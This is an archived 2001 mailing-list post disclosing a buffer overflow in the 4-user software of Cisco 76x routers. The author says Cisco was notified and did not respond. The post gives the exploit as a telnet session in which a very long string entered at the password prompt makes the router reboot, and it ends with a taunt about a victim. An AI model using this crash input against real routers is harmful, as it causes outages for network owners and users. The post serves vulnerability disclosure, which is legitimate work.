I dont know of anybody ever posting anything on this sbuject, so i'll go ahed. I found a buffer overflow in the cisco 76x series router. The bug exists only in the 4 users limit software, i couldnt reproduce it with the unlimited version. When i reported the bug to cisco i promised them that i'll post this info to public if they dont fix it withing a week. It was over a month ago, and i was never notified of any fix so i'm asuming they didnt make any fix. I also cant find any mentioning of this bug on their web site by searching for the bug id. The exploit is prety simple: telnet cisco762.domain.com Trying 1.2.3.4... Connected to 1.2.3.4. Escape character is '^]'. Enter Password:Enter a veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here and watch the prety lights go on as the cisco reboots, or imagine your victim tearing his hair out.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:35:28 PDT